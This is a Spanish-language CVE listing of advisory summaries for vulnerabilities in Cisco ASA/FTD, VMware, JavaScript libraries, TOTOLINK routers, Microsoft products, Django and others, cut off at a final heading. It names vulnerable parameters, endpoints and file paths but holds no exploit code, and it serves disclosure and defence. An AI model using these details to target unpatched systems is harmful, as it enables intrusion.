  • CVE-2021-21978
    Severidad: ALTA
    Fecha de publicación: 03/03/2021
    Fecha de última actualización: 08/08/2023
    VMware View Planner versión 4.x anterior a 4.6 Security Parche 1, contiene una vulnerabilidad de ejecución de código remota . Una comprobación inapropiada de la entrada y una falta de autorización conlleva a una carga de archivos arbitraria en una aplicación web logupload. Un atacante no autorizado con acceso de red a View Planner Harness podría cargar y ejecutar un archivo especialmente diseñado que conduzca a una ejecución de código remota dentro del contenedor logupload
  • CVE-2021-28099
    Severidad: BAJA
    Fecha de publicación: 23/03/2021
    Fecha de última actualización: 08/08/2023
    En Netflix OSS Hollow, dado que Files.exists(parent) se ejecuta antes de crear los directorios, un atacante puede crear previamente estos directorios con amplios permisos. Además, dado que se utiliza una fuente no segura de aleatoriedad, los nombres de archivo que se crearán se pueden calcular de forma determinista
  • Vulnerabilidad en un flujo de tráfico Datagram TLS (DTLS) en el proceso de negociación de SSL VPN para Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3529)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el proceso de negociación de SSL VPN para Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una recarga de un dispositivo afectado, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad es debido a una gestión de memoria direct memory access (DMA) ineficiente durante la fase de negociación de una conexión VPN SSL. Un atacante podría explotar esta vulnerabilidad mediante el envío de un flujo constante de tráfico Datagram TLS (DTLS) diseñado a un dispositivo afectado. Una explotación con éxito podría permitir a un atacante agotar la memoria DMA en el dispositivo y causar una condición de DoS
  • Vulnerabilidad en la implementación OSPF versión 2 (OSPFv2) de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3528)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación OSPF versión 2 (OSPFv2) de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar la recarga de un dispositivo afectado, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad es debido a una comprobación de entrada incompleta cuando el software afectado procesa ciertos paquetes OSPFv2 con datos Link-Local Signaling (LLS). Un atacante podría explotar esta vulnerabilidad mediante el envío de un paquete OSPFv2 malformado a un dispositivo afectado. Una explotación con éxito podría permitir a un atacante causar que un dispositivo afectado se recargue, resultando en una condición de DoS
  • Vulnerabilidad en el Clientless SSL VPN (WebVPN) de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3561)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el Clientless SSL VPN (WebVPN) de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado inyectar encabezados HTTP arbitrarios en las respuestas del sistema afectado. La vulnerabilidad es debido a un saneamiento de entrada inapropiada. Un atacante podría explotar esta vulnerabilidad al persuadir a un usuario de la interfaz para que haga clic en un enlace diseñado. Una explotación con éxito podría permitir a un atacante conducir un ataque de inyección CRLF, agregando encabezados HTTP arbitrarios en las respuestas del sistema y redireccionando al usuario a sitios web arbitrarios
  • Vulnerabilidad en el clic en un enlace en la interfaz de administración basada en web en Cisco Adaptive Security Appliance (ASA) Software (CVE-2020-3599)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de administración basada en web en Cisco Adaptive Security Appliance (ASA) Software podría permitir a un atacante remoto no autenticado conducir un ataque de tipo cross-site scripting (XSS) contra un usuario de la interfaz. Esta vulnerabilidad se presenta porque la interfaz de administración basada en web no comprueba apropiadamente una entrada suministrada por el usuario. Un atacante podría explotar esta vulnerabilidad al persuadir a un usuario de la interfaz para que haga clic en un enlace diseñado. Una explotación con éxito podría permitir a un atacante ejecutar un código script arbitrario en el contexto de la interfaz o acceder a información confidencial basada en el navegador
  • CVE-2021-1782
    Severidad: MEDIA
    Fecha de publicación: 02/04/2021
    Fecha de última actualización: 08/08/2023
    Se abordó una condición de carrera con un bloqueo mejorado. Este problema es corregido en macOS Big Sur versión 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS versión 7.3, tvOS versión 14.4, iOS versión 14.4 y iPadOS versión 14.4. Una aplicación maliciosa puede elevar privilegios. Apple tiene conocimiento de un reporte que indica que este problema puede haber sido explotado activamente.
  • CVE-2021-30144
    Severidad: MEDIA
    Fecha de publicación: 06/04/2021
    Fecha de última actualización: 08/08/2023
    El plugin Dashboard versiones hasta 1.0.2 para GLPI, permite a usuarios remotos poco privilegiados omitir un control de acceso en visualizar información sobre los últimos diez eventos, los usuarios conectados y los usuarios en la categoría de tecnología. Por ejemplo, puede ser usado un archivo plugins/dashboard/front/main2.php
  • CVE-2020-27777
    Severidad: ALTA
    Fecha de publicación: 15/12/2020
    Fecha de última actualización: 28/07/2023
    Se encontró un fallo en la manera en que RTAS manejaba los accesos a la memoria en el espacio de usuario para la comunicación del kernel. En un sistema invitado bloqueado (generalmente debido al arranque seguro) que se ejecuta en la parte superior de los hipervisores PowerVM o KVM (plataforma pseries), un usuario root como local podría usar este fallo para aumentar aún más sus privilegios a los de un kernel en ejecución
  • Vulnerabilidad en el tmm en el perfil connector en BIG-IP (CVE-2020-5854)
    Severidad: MEDIA
    Fecha de publicación: 06/02/2020
    Fecha de última actualización: 16/08/2023
    En BIG-IP versiones 15.0.0-15.0.1.1, 14.1.0-14.1.2.2, 14.0.0-14.0.1, 13.1.0-13.1.3.1, 12.1.0-12.1.5 y 11.6.0-11.6.5.1, el tmm se bloquea en determinadas circunstancias cuando se usa el perfil connector si una secuencia específica de conexiones es realizada.
  • CVE-2021-28953
    Severidad: MEDIA
    Fecha de publicación: 21/03/2021
    Fecha de última actualización: 08/08/2023
    La extensión no oficial C/C++ Advanced Lint versiones anteriores a 1.9.0 para Visual Studio Code, permite a atacantes ejecutar binarios arbitrarios si el usuario abre un repositorio diseñado
  • CVE-2019-13194
    Severidad: MEDIA
    Fecha de publicación: 13/03/2020
    Fecha de última actualización: 16/08/2023
    Algunas impresoras Brother (tal y como la HL-L8360CDW versión v1.20), fueron afectadas por diferentes vulnerabilidades de divulgación de información que suministraban información confidencial a un usuario no autenticado que visitaba una URL específica.
  • CVE-2021-20085
    Severidad: MEDIA
    Fecha de publicación: 23/04/2021
    Fecha de última actualización: 08/08/2023
    Una Modificación Controlada Inapropiadamente de Object Prototype Attributes ("Prototype Pollution") en backbone-query-parameters versión 0.4.0, permite a un usuario malicioso inyectar propiedades en Object.prototype
  • CVE-2021-20084
    Severidad: MEDIA
    Fecha de publicación: 23/04/2021
    Fecha de última actualización: 08/08/2023
    Una Modificación Controlada Inapropiadamente de Object Prototype Attributes("Prototype Pollution") en jquery-sparkle versión 1.5.2-beta, permite a un usuario malicioso inyectar propiedades en Object.prototype
  • CVE-2021-25928
    Severidad: ALTA
    Fecha de publicación: 26/04/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación de prototipo en "safe-obj" versiones 1.0.0 hasta 1.0.2, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-20088
    Severidad: MEDIA
    Fecha de publicación: 23/04/2021
    Fecha de última actualización: 08/08/2023
    Una Modificación Controlada Inapropiadamente de Object Prototype Attributes ("Prototype Pollution") en mootools-more versión 1.6.0, permite a un usuario malicioso inyectar propiedades en Object.prototype
  • CVE-2021-20087
    Severidad: MEDIA
    Fecha de publicación: 23/04/2021
    Fecha de última actualización: 08/08/2023
    Una Modificación Controlada Inapropiadamente de Object Prototype Attributes ("Prototype Pollution") en jquery-deparam versión 0.5.1, permite a un usuario malicioso inyectar propiedades en Object.prototype
  • CVE-2021-20086
    Severidad: MEDIA
    Fecha de publicación: 23/04/2021
    Fecha de última actualización: 08/08/2023
    Una Modificación Controlada Inapropiadamente de Object Prototype Attributes ("Prototype Pollution") en jquery-bbq versión 1.2.1, permite a un usuario malicioso inyectar propiedades en Object.prototype
  • CVE-2021-20089
    Severidad: MEDIA
    Fecha de publicación: 23/04/2021
    Fecha de última actualización: 08/08/2023
    Una Modificación Controlada Inapropiadamente de Object Prototype Attributes ("Prototype Pollution") en purl versión 2.3.2, permite a un usuario malicioso inyectar propiedades en Object.prototype
  • Vulnerabilidad en configuraciones específicas de AnyConnect y WebVPN en el software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) (CVE-2021-1445)
    Severidad: MEDIA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 16/08/2023
    Múltiples vulnerabilidades en el software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD), podrían permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Estas vulnerabilidades son debido a una falta de comprobación de entrada apropiada de la petición HTTPS. Un atacante podría explotar estas vulnerabilidades mediante el envío de una petición HTTPS diseñada hacia un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar que el dispositivo afectado se recargue, resultando en una condición DoS. Nota: Esta vulnerabilidad afecta solo a configuraciones específicas de AnyConnect y WebVPN. Para obtener más información, consulte la sección Productos vulnerables
  • CVE-2021-23364
    Severidad: MEDIA
    Fecha de publicación: 28/04/2021
    Fecha de última actualización: 08/08/2023
    El paquete browserslist de versiones 4.0.0 y anteriores hasta 4.16.5, son vulnerables a una Denegación de Servicio de Expresión Regular (ReDoS) durante el análisis de consultas
  • Vulnerabilidad en el envío de una petición HTTPS en el software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) (CVE-2021-1504)
    Severidad: MEDIA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 16/08/2023
    Múltiples vulnerabilidades en el software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD), podrían permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Estas vulnerabilidades son debido a una falta de comprobación de entrada apropiada de la petición HTTPS. Un atacante podría explotar estas vulnerabilidades mediante el envío de una petición HTTPS diseñada hacia un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar que el dispositivo afectado se recargue, resultando en una condición DoS. Nota: Esta vulnerabilidad afecta solo a configuraciones específicas de AnyConnect y WebVPN. Para obtener más información, consulte la sección Productos vulnerables
  • CVE-2021-25927
    Severidad: ALTA
    Fecha de publicación: 26/04/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Prototype pollution en "safe-flat" versiones 2.0.0 hasta 2.0.1, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-1083
    Severidad: MEDIA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 08/08/2023
    El software NVIDIA vGPU contiene una vulnerabilidad en el controlador del modo kernel invitado y el Virtual GPU Manager (plugin vGPU), en el que la longitud de la entrada no es comprobada, lo que puede conllevar a una divulgación de información, manipulación de datos o denegación de servicio. Esto afecta a vGPU versión 12.x (anteriores a 12.2) y versión 11.x (anteriores a 11.4).
  • CVE-2021-1082
    Severidad: MEDIA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 08/08/2023
    El software NVIDIA vGPU contiene una vulnerabilidad en Virtual GPU Manager (plugin vGPU), en la que no es comprobada una longitud de la entrada, lo que puede conllevar a una divulgación de información, manipulación de datos o denegación de servicio. vGPU versiones 12.x (anteriores a 12.2), versión 11.x (anteriores a 11.4) y versión 8.x (anterior a 8.7)
  • CVE-2021-1081
    Severidad: MEDIA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 08/08/2023
    El software NVIDIA vGPU contiene una vulnerabilidad en el controlador de modo de kernel invitado y el administrador de Virtual GPU (plugin vGPU), en el que la longitud de la entrada no es comprobada, lo que puede conllevar a una divulgación de información, manipulación de datos o denegación de servicio. Esto afecta a vGPU versión 12.x (anteriores a 12.2), versión 11.x (anteriores a 11.4) y versión 8.x (anteriores a 8.7).
  • Vulnerabilidad en el envío de una petición HTTP en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) (CVE-2021-1493)
    Severidad: ALTA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante remoto autenticado causar un desbordamiento del búfer en un sistema afectado. La vulnerabilidad es debido a comprobaciones de límites insuficientes para datos específicos que se proporcionan a la interfaz de servicios web de un sistema afectado. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición HTTP maliciosa. Una explotación con éxito podría permitir al atacante causar una condición de desbordamiento de búfer en el sistema afectado, lo que podría revelar fragmentos de datos o hacer que el dispositivo se recargue, resultando en una condición de denegación de servicio (DoS)
  • Vulnerabilidad en la CLI del Software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) (CVE-2021-1476)
    Severidad: ALTA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la CLI del Software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante autenticado local ejecutar comandos arbitrarios en el sistema operativo (SO) subyacente de un dispositivo afectado. La vulnerabilidad es debido a una comprobación insuficiente de entrada de los comandos suministrados por el usuario. Un atacante podría explotar esta vulnerabilidad al autenticarse en un dispositivo y enviar una entrada diseñada para comandos específicos. Una explotación con éxito podría permitir al atacante ejecutar comandos en el sistema operativo subyacente con privilegios root. Para explotar esta vulnerabilidad, un atacante debe tener credenciales válidas de nivel de administrador
  • CVE-2021-28359
    Severidad: MEDIA
    Fecha de publicación: 02/05/2021
    Fecha de última actualización: 02/08/2023
    El parámetro "origin" pasado a algunos de los endpoints como "/trigger" era vulnerable a una explotación de tipo XSS. Este problema afecta a Apache Airflow versiones anteriores a 1.10.15 en la serie 1.x y afecta a las series 2.0.0 y 2.0.1 y 2.x. Es lo mismo que CVE-2020-13944 y CVE-2020-17515, pero la corrección implementada no corrigió el problema por completo. Actualice a Airflow versiones 1.10.15 o 2.0.2. Actualice también su versión de Python a las últimas versiones de PATCH disponibles de las versiones MINOR instaladas, ejemplo de actualización a Python versión 3.6.13 si está en Python versión 3.6. (Estos contienen la corrección para CVE-2021-23336 https://nvd.nist.gov/vuln/detail/CVE-2021-23336).
  • CVE-2021-45734
    Severidad: ALTA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK X5000R versión v9.1.0u.6118_B20201102, contiene un desbordamiento de pila en la función setUrlFilterRules. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio del parámetro url
  • CVE-2021-45736
    Severidad: ALTA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK X5000R versión v9.1.0u.6118_B20201102, contiene un desbordamiento de pila en la función setL2tpServerCfg. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio de los parámetros eip, sip, server
  • CVE-2021-45741
    Severidad: ALTA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK X5000R versión v9.1.0u.6118_B20201102, contiene un desbordamiento de pila en la función setIpv6Cfg. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio de los parámetros relay6to4
  • CVE-2021-30946
    Severidad: MEDIA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con restricciones mejoradas. Este problema es corregido en macOS Monterey versión 12.1, watchOS versión 8.3, iOS versión 15.2 e iPadOS versión 15.2, macOS Big Sur versión 11.6.2. Una aplicación maliciosa puede omitir determinadas preferencias de privacidad
  • CVE-2021-44746
    Severidad: MEDIA
    Fecha de publicación: 01/02/2022
    Fecha de última actualización: 08/08/2023
    UNIVERGE DT 820 versiones V3.2.7.0 y anteriores, UNIVERGE DT 830 versiones V5.2.7.0 y anteriores, UNIVERGE DT 930 versiones V2.4.0.0 y anteriores, IP Phone Manager versiones V8.9.1 y anteriores, Data Maintenance Tool for DT900 Series versiones V5.3.0.0 y anteriores, Data Maintenance Tool for DT800 Series versiones V4.2.0.0 y anteriores permiten que un atacante remoto que pueda acceder a la red interna, pueda obtener la información de configuración
  • CVE-2022-0366
    Severidad: MEDIA
    Fecha de publicación: 02/02/2022
    Fecha de última actualización: 08/08/2023
    Un usuario autenticado y autorizado del agente podría conseguir potencialmente acceso administrativo por medio de una vulnerabilidad SQLi a la Consola Capsule8 entre las versiones 4.6.0 y 4.9.1
  • CVE-2021-38567
    Severidad: MEDIA
    Fecha de publicación: 11/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Foxit PDF Editor versiones anteriores a 11.0.1 y en PDF Reader versiones anteriores a 11.0.1 en macOS. No maneja apropiadamente las entradas de diccionario que faltan, conllevando a una desreferencia de puntero NULL, también se conoce como CNVD-C-2021-95204
  • CVE-2021-44847
    Severidad: ALTA
    Fecha de publicación: 13/12/2021
    Fecha de última actualización: 08/08/2023
    Un desbordamiento del búfer en la región stack de la memoria en la función handle_request en el archivo DHT.c en toxcore versiones 0.1.9 hasta 0.1.11 y 0.2.0 hasta 0.2.12, (causado por un cálculo inapropiado de la longitud durante el manejo de los paquetes de red recibidos) permite a atacantes remotos bloquear el proceso o ejecutar potencialmente código arbitrario por medio de un paquete de red
  • CVE-2021-38130
    Severidad: MEDIA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha identificado una posible vulnerabilidad de filtrado de información en las versiones de Micro Focus Voltage SecureMail Mail Relay anteriores a 7.3.0.1. La vulnerabilidad podría ser explotada para crear un ataque de filtrado de información
  • CVE-2021-44246
    Severidad: ALTA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los dispositivos Totolink A3100R versión v4.1.2cu.5050_B20200504, A830R versión v5.9c.4729_B20191112 y A720R versión v4.1.5cu.470_B20200911 contienen un desbordamiento de pila en la función setNoticeCfg. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio del parámetro IpTo
  • CVE-2021-41571
    Severidad: MEDIA
    Fecha de publicación: 01/02/2022
    Fecha de última actualización: 24/07/2023
    En Apache Pulsar es posible acceder a datos de BookKeeper que no pertenecen a los temas accesibles por el usuario autenticado. La API de administración get-message-by-id requiere que el usuario introduzca un tema y un ledger id. El identificador del libro mayor es un puntero a los datos, y supone que es válido para el tema. Los controles de autorización son llevados a cabo contra el nombre del tema y no se presenta una comprobación apropiada de que el ID del libro mayor sea válido en el contexto de dicho libro mayor. Por lo tanto, puede ocurrir que el usuario sea capaz de leer de un libro mayor que contiene datos que pertenecen a otro inquilino. Este problema afecta a Apache Pulsar versiones 2.8.0 y anteriores; Apache Pulsar versiones 2.7.3 y anteriores; Apache Pulsar versiones 2.6.4 y anteriores
  • CVE-2021-44886
    Severidad: MEDIA
    Fecha de publicación: 04/02/2022
    Fecha de última actualización: 08/08/2023
    En Zammad versión 5.0.2, los agentes pueden configurar periodos de "out of office" y personas sustitutas. Si las personas sustitutas no tienen los mismos permisos que el agente original, podrían recibir notificaciones de tickets a los que no presentan acceso
  • CVE-2021-42295
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Visual Basic for Applications
  • CVE-2022-22832
    Severidad: ALTA
    Fecha de publicación: 06/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Servisnet Tessa versión 0.0.2. Los datos de autorización están disponibles por medio de una petición /data-service/users/ no autenticada
  • CVE-2021-45116
    Severidad: MEDIA
    Fecha de publicación: 04/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Django versiones 2.2 anteriores a 2.2.26, 3.2 anteriores a 3.2.11 y 4.0 anteriores a 4.0.1. Debido al aprovechamiento de la lógica de resolución de variables del lenguaje de plantillas de Django, el filtro de plantillas dictsort era potencialmente vulnerable a una divulgación de información, o a una llamada de método no intencionada, si le es pasada una clave apropiadamente diseñada.
  • CVE-2022-24450
    Severidad: ALTA
    Fecha de publicación: 08/02/2022
    Fecha de última actualización: 08/08/2023
    NATS nats-server versiones anteriores a 2.7.2, presenta un Control de Acceso Incorrecto. Cualquier usuario autenticado puede obtener los privilegios de la cuenta System haciendo un uso inapropiado de la función "dynamically provisioned sandbox accounts"
  • CVE-2021-45327
    Severidad: ALTA
    Fecha de publicación: 08/02/2022
    Fecha de última actualización: 08/08/2023
    Gitea versiones anteriores a 1.11.2, está afectado por los Métodos de Permiso HTTP Confiables en el Lado del Servidor cuando hace referencia a la API de administración o de usuario vulnerable, lo que podría permitir a un usuario remoto malicioso ejecutar código arbitrario
  • CVE-2021-44956
    Severidad: MEDIA
    Fecha de publicación: 08/02/2022
    Fecha de última actualización: 17/08/2023
    Se presentan dos vulnerabilidades de desbordamiento de búfer en la región Heap de la memoria en ffjpeg versiones hasta 01.01.2021. Es similar a CVE-2020-23852. Los problemas que son encontrados en la función jfif_decode en el archivo ffjpeg/src/jfif.c (línea 552) podrían causar una denegación de servicio al usar un archivo jpeg diseñado
  • CVE-2021-44957
    Severidad: MEDIA
    Fecha de publicación: 08/02/2022
    Fecha de última actualización: 17/08/2023
    Se presenta una vulnerabilidad de desbordamiento de búfer global en ffjpeg versiones hasta 01.01.2021. Es similar a CVE-2020-23705. El problema está en la función jfif_encode en el archivo ffjpeg/src/jfif.c (línea 708) y podría causar una denegación de servicio al usar un archivo jpeg diseñado
  • CVE-2022-24682
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en la funcionalidad Calendar en Zimbra Collaboration Suite 8.8.x versiones anteriores a 8.8.15 parche 30 (actualización 1), como es explotado "in the wild" a partir de diciembre 2021. Un atacante podría colocar HTML que contenga JavaScript ejecutable dentro de los atributos de los elementos. Este marcado es convertido en unescaped, causando que el marcado arbitrario sea inyectado en el documento
  • CVE-2022-23262
    Severidad: MEDIA
    Fecha de publicación: 07/02/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (basado en Chromium). Este CVE ID es diferente de CVE-2022-23263
  • CVE-2022-23263
    Severidad: MEDIA
    Fecha de publicación: 07/02/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Edge (basado en Chromium). Este CVE ID es diferente de CVE-2022-23262
  • CVE-2022-21968
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Omisión de Funcionalidades de Seguridad de Microsoft SharePoint Server
  • CVE-2022-21996
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Win32k
  • CVE-2022-23271
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Microsoft Dynamics GP. Este ID de CVE es diferente de CVE-2022-23272, CVE-2022-23273
  • CVE-2022-23272
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Microsoft Dynamics GP. Este ID de CVE es diferente de CVE-2022-23271, CVE-2022-23273
  • CVE-2022-23273
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Microsoft Dynamics GP. Este ID de CVE es diferente de CVE-2022-23271, CVE-2022-23272
  • CVE-2022-23276
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en SQL Server para contenedores de Linux
  • CVE-2022-20037
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    En ion driver, se presenta una posible divulgación de información debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06171705; ID de Incidencia: ALPS06171705
  • CVE-2022-20036
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    En ion driver, se presenta una posible divulgación de información debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local remota sin ser requeridos privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06171689; ID de Incidencia: ALPS06171689
  • CVE-2022-20017
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    En ion driver, se presenta una posible divulgación de información debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05862991; ID de Incidencia: ALPS05862991
  • CVE-2022-20038
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    En ccu driver, se presenta una posible corrupción de memoria debido a una comprobación de límites incorrecta. Esto podría conllevar a una escalada local de privilegios con privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06183335; ID de Incidencia: ALPS06183335
  • CVE-2022-23320
    Severidad: MEDIA
    Fecha de publicación: 07/02/2022
    Fecha de última actualización: 08/08/2023
    XMPie uStore versión 12.3.7244.0 permite a administradores generar informes basados en consultas SQL sin procesar. Dado que la aplicación es enviada con credenciales administrativas por defecto, un atacante podría autenticarse en la aplicación y exfiltrar información confidencial de la base de datos
  • CVE-2022-23252
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Microsoft Office
  • CVE-2022-23254
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Microsoft Power BI
  • CVE-2022-23255
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de la función de seguridad de Microsoft OneDrive para Android
  • CVE-2021-39631
    Severidad: BAJA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    En la función clear_data_dlg_text del archivo strings.xml, Se presenta una posible situación cuando la funcionalidad "Clear storage" establece unas expectativas de seguridad/privacidad erróneas debido a un mensaje engañoso. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12, ID de Android: A-193890833
  • CVE-2022-21173
    Severidad: ALTA
    Fecha de publicación: 08/02/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de funcionalidad oculta en los routers LAN de ELECOM (firmware WRH-300BK3 versiones v1.05 y anteriores, firmware WRH-300WH3 versiones v1.05 y anteriores, firmware WRH-300BK3-S versiones v1.05 y anteriores, firmware WRH-300DR3-S versiones v1.05 y anteriores, firmware WRH-300LB3-S versiones v1.05 y anteriores, WRH-300PN3-S firmware versiones v1.05 y anteriores, WRH-300WH3-S firmware versiones v1.05 y anteriores, y WRH-300YG3-S firmware versiones v1.05 y anteriores) permite a un atacante en la red adyacente ejecutar un comando arbitrario del sistema operativo por medio de vectores no especificados
  • CVE-2021-33061
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una administración no suficiente del flujo de control para los controladores y adaptadores Ethernet Intel(R) 82599 puede permitir a un usuario autenticado habilitar potencialmente una denegación de servicio por medio de acceso local
  • CVE-2021-0147
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Un bloqueo inapropiado en el controlador de administración de energía (PMC) para algunos firmware de chipset Intel versiones anteriores a pmc_fw_lbg_c1-21ww02a y pmc_fw_lbg_b0-21ww02a, puede permitir a un usuario privilegiado habilitar potencialmente una denegación de servicio por acceso local
  • CVE-2020-11732
    Severidad: MEDIA
    Fecha de publicación: 13/04/2020
    Fecha de última actualización: 07/08/2023
    El plugin Media Library Assistant versiones anteriores a 2.82 para Wordpress, sufre de una vulnerabilidad de Inclusión de Archivo Local en link=download de mla_gallery.
  • CVE-2021-0127
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una administración no suficiente del flujo de control en algunos procesadores Intel(R) puede permitir a un usuario autenticado habilitar potencialmente una denegación de servicio por acceso local
  • CVE-2021-39997
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de verificación de parámetros de entrada no estricta en el ensamblaje de audio. Una explotación con éxito de esta vulnerabilidad puede causar acceso fuera de límites
  • CVE-2022-22779
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Los clientes de Keybase para macOS y Windows anteriores a la versión 5.9.0 no eliminan correctamente los mensajes explotados iniciados por un usuario. Esto puede ocurrir si el usuario receptor cambia a una función que no sea de chat y coloca el host en un estado de suspensión antes de que el usuario emisor explote los mensajes. Esto podría conllevar a una divulgación de información confidencial que debía ser eliminada del sistema de archivos de un usuario
  • CVE-2020-11928
